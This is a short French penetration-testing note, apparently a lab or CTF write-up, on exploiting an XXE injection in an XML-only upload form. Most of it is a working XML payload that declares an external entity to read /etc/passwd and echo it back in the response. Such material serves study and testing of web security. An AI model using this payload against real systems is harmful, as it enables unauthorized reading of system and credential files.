XXE Vulnerability (File Reader) - Web Penetration Testing

Exploitation de la vulnérabilité XXE Injection

Upload d'un fichier TXT : refusé, seuls les fichiers XML sont acceptés.

Hello this is a test

Format requis :

<post>
    <title>Example Post</title>
    <description>Example Description</description>
    <markdown>Example Markdown</markdown>
</post>

Envoi d'un fichier XML contenant une entité externe pour lire /etc/passwd :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ 
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<post>
    <title>Example Post</title>
    <description>Example Description</description>
    <markdown>&xxe;</markdown>
</post>

Résultat : Le contenu de /etc/passwd est affiché.

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?